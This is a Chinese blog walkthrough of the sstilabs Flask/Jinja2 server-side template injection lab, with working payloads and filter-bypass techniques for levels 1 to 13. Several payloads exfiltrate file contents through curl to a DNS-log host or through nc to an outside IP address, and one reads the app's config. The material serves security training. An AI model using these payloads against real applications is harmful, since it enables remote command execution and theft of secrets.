flask sssti lab闯关记录

最新推荐文章于 2024-04-05 09:55:26 发布
最新推荐文章于 2024-04-05 09:55:26 发布
阅读量2.7k 收藏 28
点赞数 5
分类专栏: web安全 ssti模板注入 文章标签: web安全 flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44576725/article/details/124176682
版权

flask ssti lab闯关记录

sstilab是一个模板注入的靶场,目前只有Flask模板注入的练习

地址:https://github.com/X3NNY/sstilabs

image-20220413022608965

level 1

判断出是post方法

image-20220413121154292

借用bp的intrude模块查看可以利用的类,这里查找的模块是__import__

image-20220413122654917

发现80、81、82、83可以有__import__模块,加以利用得到payload

{{[].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()}}

打过去获得flag

image-20220413124818248

还可以尝试其他模块,比如__builtins__popenossys

# __builtins__
{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__['__import__']('os').popen('cat flag').read()}}
# popen
{{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat flag').read()}}
# os
{{().__class__.__base__.__subclasses__()[213].__init__.__globals__['os'].popen('cat flag').read()}}

level 2

过滤了{ } ,用{%%}替代。这里有两种方法绕过

  • print标记

    {%print [].__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("cat flag").read()%}

    image-20220413124858389

  • dnslog外带

    {% if ().__class__.__base__.__subclasses__()[80].__init__.__globals__['__import__']('os').popen("curl `cat flag`.0ppgif.ceye.io").read()=='ssti' %}1{% endif %}

    image-20220413124731416

level 3

这道是盲注,有两种方法绕过

  • dnslog外带

    {% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('curl http://`cat flag`.0ppgif.ceye.io').read()}}{% endif %}{% endfor %}

    image-20220413132201345

  • 通过nc命令将文件内容回显到自己的服务器上

    {% for i in ''.__class__.__mro__[-1].__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__['os'].popen('cat flag|nc 119.91.214.224 1234').read()}}{% endif %}{% endfor %}

    image-20220413132542877

level 4

过滤了[ ],这里有两种情况下的过滤

  • 使用pop__getitem__()代替索引中的[]
  • 使用__getattribute__代替魔术方法中的[]
# os
{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(213).__init__.__globals__.__getitem__('os').popen('cat flag').read()}}

# popen
{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.__getitem__('popen')('cat flag').read()}}

# 一句话
{% for i in ''.__class__.__mro__.__getitem__(-1).__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__.__getitem__('os').popen('cat flag').read()}}{% endif %}{% endfor %}

level 5

过滤了单、双引号,有两种方法绕过

  • request绕过

    #post
# __builtins__
{{().__class__.__base__.subclasses__()[80].__init__.__globals__.__builtins__[request.values.arg1](request.values.arg2).popen(request.values.arg3).read()}}
POST:arg1=__import__,arg2=os,arg3=popen

# popen
{{().__class__.__base__.subclasses__()[132].__init__.__globals__[request.values.arg1](request.values.arg2).read()}}
POST:arg1=popen,arg2=cat flag

# os
{{().__class__.__base__.subclasses__()[213].__init__.__globals__[request.values.arg1].popen(request.values.arg2).read()}}
POST:arg1=popen,arg2=cat flag


#cookie
# popen
{{().__class__.__base__.subclasses__()[132].__init__.__globals__[request.cookies.arg1](request.cookies.arg2).read()}}
Cookie:arg1=popen,arg2=cat flag

  • chr绕过

    先找出chr()函数的位置

    {{().__class__.__mro__[-1].__subclasses__()[0].__init__.__globals__.__builtins__.chr}}

    image-20220413151509332

{%set chr=[].__class__.__mro__[-1].__subclasses__()[58].__init__.__globals__.__builtins__.chr%}
{%print(().__class__.__mro__[-1].__subclasses__()[258].__init__.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read())%}

不过这个没成功,不知道什么原因。

level 6

绕过下划线_,使用十六进制编码绕过,_编码后为\x5f

先进行替换

string1 = "{{().__class__.__base__.__subclasses__()[213].__init__.__globals__['os'].popen('cat flag').read()}}"
def tohex(string):
    result = ""
    
    for i in range(len(string)):
        if string[i] == '_':
            result += "\\x"+hex(ord(string[i]))[2:]
            continue
        result += string[i]
    print(result)

tohex(string1)

再添加[""],得到

{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbase\x5f\x5f"]["\x5f\x5fsubclasses\x5f\x5f"]()[213]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['os'].popen('cat flag').read()}}
  • Unicode编码
{{lipsum|attr("\u005f\u005fglobals\u005f\u005f")|attr("\u005f\u005fgetitem\u005f\u005f")("os")|attr("popen")("cat flag")|attr("read")()}}

这里使用了lipsum这个方法直接调用os

  • base64编码
{{()|attr('X19jbGFzc19f'.decode('base64'))|attr('X19iYXNlX18='.decode('base64'))|attr('X19zdWJjbGFzc2VzX18='.decode('base64'))()|attr('X19nZXRpdGVtX18='.decode('base64'))(213)|attr('X19pbml0X18='.decode('base64'))|attr('X19nbG9iYWxzX18='.decode('base64'))|attr('X19nZXRpdGVtX18='.decode('base64'))('os')|attr('popen')('cat flag')|attr('read')()}}
  • attr()配合request
{{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}} 
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat f*').read()

image-20220413155846489

level 7

过滤了.

  • []绕过

    {{()['__class__']['__base__']['__subclasses__']()[213]['__init__']['__globals__']['os']['popen']('cat flag')['read']()}}

  • attr()绕过

    {{()|attr('__class__')|attr('__base__')|attr('__subclasses__')()|attr('__getitem__')(213)|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('cat flag')|attr('read')()}}

level 8

WAF: bl[“class”, “arg”, “form”, “value”, “data”, “request”, “init”, “global”, “open”, “mro”, “base”, “attr”]

过滤了一堆关键字

  • +拼接绕过

    # popen
{{()['__cl'+'ass__']['__ba'+'se__']['__subc'+'lasses__']()['__getitem__'](132)['__in'+'it__']['__gl'+
'obals__']['__getitem__']('po'+'pen')('cat flag').read()}}

# os
{{()['__cl'+'ass__']['__ba'+'se__']['__subcl'+'asses__']()['__getitem__'](213)['__in'+'it__']['__gl'+'obals__']['__getitem__']('os')['po'+'pen']('cat flag')['read']()}}

level 9

过滤了数字

  • 用循环找到能利用的类直接用
{% for i in ''.__class__.__base__.__subclasses__() %}{% if i.__name__=='Popen' %}{{ i.__init__.__globals__.__getitem__('os').popen('cat flag').read()}}{% endif %}{% endfor %}
  • 用lipsum不通过数字直接利用
{{lipsum|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat flag")|attr("read")()}}
  • 构造数字进行拼接

首先构造数字

{%set zero=([]|string|list).index('[')%}
{%set one=dict(a=a)|join|count%}
{%set two=dict(aa=a)|join|count%}
{%set three=dict(aaa=a)|join|count%}
{%set four=dict(aaaa=a)|join|count%}
{%set five=dict(aaaaa=a)|join|count%}
{%set six=dict(aaaaaa=a)|join|count%}
{%set seven=dict(aaaaaaa=a)|join|count%}
{%set eight=dict(aaaaaaaa=a)|join|count%}
{%set nine=dict(aaaaaaaaa=a)|join|count%}

然后拼接数字,这里以213为例

{% set erwuba=(two~one~three)|int %}

最终payload

{%set one=dict(a=a)|join|count%}
{%set two=dict(aa=a)|join|count%}
{%set three=dict(aaa=a)|join|count%}
{% set eryisan=(two~one~three)|int %}
{{().__class__.__base__.__subclasses__()[eryisan].__init__.__globals__['os'].popen('cat flag').read()}}

level 10

WAF: set config = None

这一关的目标不是flag,而是获取config,可以通过current_app来获取

  • url_for
{{url_for.__globals__['current_app'].config}}
  • get_flashed_messages
{{get_flashed_messages.__globals__['current_app'].config}}

level 11

**WAF: bl[’’’, ‘"’, ‘+’, ‘request’, ‘.’, ‘[’, ‘]’] **

11关过滤了一堆东西,先确定一个利用的基本payload

{{lipsum|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat flag")|attr("read")()}}

然后再构造变量来绕过,思路为:利用set来定义变量,使用attr()来提取使用变量绕过点,中括号。但是这样存在一个问题是需要获取下划线,这里通过lipsum来获取下划线。

首先查看_在第几个

{{(lipsum|string|list)}}

得到,这里是下标18为下划线

Hello ['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '7', '4', '1', '9', '6', '1', 'c', '6', '7', '0', '>']

{{(lipsum|string|list)|attr(pop)(18)}}

这里问题来了,attr()里面要求的是字符串,直接输pop需要用引号''包围起来,但是这里又过滤了引号,所以要先构造一个pop字符串:

{% set pop=dict(pop=a)|join %}
{% xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}

此时就能成功取到_,在用下划线去构造其他的类:

{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}

再去构造其他用到的方法:

{% set space=(lipsum|string|list)|attr(pop)(9)%}
{% os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}

最后就是完整的利用语法:

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

整合在一起就是

{% set pop=dict(pop=a)|join %}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(9)%}
{% set os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

level 12

WAF:bl[’_’, ‘.’, ‘0-9’, ‘\’, ‘’’, ‘"’, ‘[’, ‘]’]

这关还对数字进行了过滤,也就是在上一关的payload基础上,设置一下数字的获取

{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=nine+nine%}
{% set pop=dict(pop=a)|join %}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(e)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(nine)%}
{% set os=dict(os=a)|join%}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

level 13

WAF:bl[’_’, ‘.’, ‘\’, ‘’’, ‘"’, ‘request’, ‘+’, ‘class’, ‘init’, ‘arg’, ‘config’, ‘app’, ‘self’, ‘[’, ‘]’]

增加了一些关键字以及+的过滤,直接用11的payload即可,或者改一下12关的payload

{%set one=dict(a=a)|join|count%} 
{%set eight=dict(aaaaaaaa=a)|join|count%}
{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=(one~eight)|int%} 
{% set pop=dict(pop=a)|join %} 
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(eighteen)%} 
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join%}
{% set space=(lipsum|string|list)|attr(pop)(nine)%} {% set os=dict(os=a)|join%} 
{% set popen=dict(popen=a)|join%} {% set cat=dict(cat=a)|join%} 
{% set cmd=(cat,space,dict(flag=a)|join)|join%} {% set read=dict(read=a)|join%}  

{{lipsum|attr(globals)|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}

参考资料

GitHub SSTI靶场 wp

MAR & DASCTF 2021 baby_flask

GitHub SSTI靶场 wp

MAR & DASCTF 2021 baby_flask

CTFshow-WEB入门-SSTI

拓海AE
关注
  • 5
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_84009773的博客
04-12 896
][外链图片转存中…(img-NVeRElHC-1712867579624)]
SSTI注入WAF绕过篇
最新发布
zkaq7777777的博客
06-03 716
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎?模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
ssti-flask-labs
qing_chuan_的博客
07-25 570
第一关轻松过,没waf,找了半天的os模块在哪,一直以为是132,结果在133.。。。。。
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 3731
1JAVA环境。
SSTI-lab
cxiaodi的博客
07-02 402
ssti-lab
sqli-labs第一关
m0_58213960的博客
02-14 3118
sqli-labs第一关
SSTI靶场
qq_63928796的博客
06-21 1009
SSTI,又称服务端模板注入攻击。jinja2模板中使用{}语法表示一个变量,它是一种特殊的占位符。当利用jinja2进行渲染的时候,它会把这些特殊的占位符进行填充/替换。但是在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell等问题首先看一下__class__用python试一下输出了 说明''是str类另外还有其他类型str(字符串)、dict(字典)、tuple(元组)、list(列表),这些类型的基类都是object,...
SSTI-flask
unexpectedthing的博客
11-27 511
文章目录前言flask基础SSTI简介魔术方法命令执行文件读取通用命令执行过滤bypass参考文献 前言 从极客大挑战中一道题,虽然挺简单的,但是自己发现在模板注入中有很多不懂的东西。 flask基础 先理解flask的流程明白 from flask import flask @app.route('/index/') def hello_word(): return 'hello word' 其中@app.route(’/index/’),是将函数跟url绑定起来,当你访问http://xxx
MAR & DASCTF 2021 baby_flask
feng的博客
03-27 3321
前言 周末又到了补作业的好时间,本来想逃一波作业来打打这个比赛,结果卡的我属实难受,把第一道webssti给做了就去补作业了,其他的web没来得及看,不知道还有没有复现了(哭)。 easy_SSTI(好像是叫这个?) 单纯的SSTI了,f12看一下给了黑名单: Hi young boy!</br> Do you like ssti?</br> blacklist</br> '.','[','\'','"',''\\','+',':','_',<
labar flash源码
10-23
《拍拍网的元宝游戏Labar Flash源码解析与应用探讨》 在数字娱乐领域,Flash技术曾是构建交互式网页游戏的重要工具,其中Labar Flash源码是极具代表性的案例。"拍拍网的元宝游戏Labar Flash源码"是这款基于Flash的...
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器时,即使没有创建任何变量或函数,还是会有很多函数可供使用,这些就是python的内建函数。 名称空间:从名称到对象的映射 1.内建名称空间:python自带名字,在解释器启动时产生,存放一些pytho
FlaskLab:Flask 中的实验
06-30
烧瓶实验室 我的 Flask 相关实验的回购
Vlab-Physics-Flash
03-16
《Vlab-Physics-Flash: 探索ActionScript在物理实验模拟中的应用》 Vlab-Physics-Flash是一个专门用于物理学教育的互动平台,利用Adobe Flash技术和ActionScript编程语言,为学习者提供了一系列生动、直观的虚拟...
lab2_SQL.rar_oracle_oracle 10g lab2_sql lab第二关
09-24
"lab2_SQL.rar"是一个压缩文件,包含了“oracle_10g_lab2”和“sql_lab第二关”的相关资料,旨在帮助学习者通过实践提升对SQL的理解和操作技能。 首先,让我们从基础开始,SQL是用于管理和处理关系数据库的标准语言...
Vlab-ComputerScience-Flash
03-17
《Vlab-ComputerScience-Flash:深入探索ActionScript编程》 在计算机科学的世界里,Flash曾经是构建交互式网页和动态内容的首选工具,而ActionScript则是Flash的灵魂所在。本资源"Vlab-ComputerScience-Flash"聚焦...
cesiumlab2_2.3.4地图工具
01-17
"cesiumlab2_2.3.4地图工具"是一个基于Cesium技术的地理信息系统(GIS)应用,主要用于提供三维地图展示和分析功能。CesiumLab是Cesium的一个扩展工具,它增强了Cesium的核心能力,使得用户能够更方便地创建、编辑和...
SSTI Labs:自动化安全测试的新星
gitblog_00027的博客
04-05 342
SSTI Labs:自动化安全测试的新星 项目地址:https://gitcode.com/X3NNY/sstilabs 项目简介 SSTI Labs 是一个致力于自动化Web应用安全扫描的开源项目。它通过模拟多种安全攻击,帮助开发者识别并修复潜在的安全漏洞,保障Web应用的安全性。该项目采用Python编写,并且支持多种流行的Web框架,如Django、Flask等。 技术分析 SSTI Lab...
BUU刷题记录——5
weixin_43610673的博客
09-21 1513
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
sql-lab第42关
07-28
抱歉,我没有找到关于sql-lab第42关的引用内容。可能这个关卡的信息不在提供的引用中。如果你有其他问题,我会尽力回答。 #### 引用[.reference_title] - *1* *3* [sql-labs 闯关 21~25](https://blog.csdn.net/qq_44663230/article/details/126386401)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sql-lab(ALL 1-65)](https://blog.csdn.net/lee_maple/article/details/123363445)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值